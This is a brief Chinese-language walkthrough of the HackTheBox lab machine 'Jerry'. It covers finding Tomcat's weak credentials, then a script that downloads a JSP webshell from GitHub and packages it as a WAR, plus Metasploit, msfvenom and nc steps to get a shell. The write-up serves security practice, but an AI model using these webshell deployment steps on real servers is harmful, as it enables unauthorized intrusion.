关于渗透测试:HTBJerry

44次阅读

共计 360 个字符,预计需要花费 1 分钟才能阅读完成。

easy box.

首先 nmap 开路:

找到 8080 端口:

Tomcat 字典:
https://raw.githubusercontent…
找到弱口令 tomcat:s3cret

部署 war 包:
办法 1:
官网 walkthrough 上的:

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 

部署 wshell:

门路比拟深

拿到 flag

办法 2:
msf 应用 multi/http/tomcat_mgr_upload



办法 3:
msfvenom 生成 war 包

上传 war 包后 nc:

正文完
 0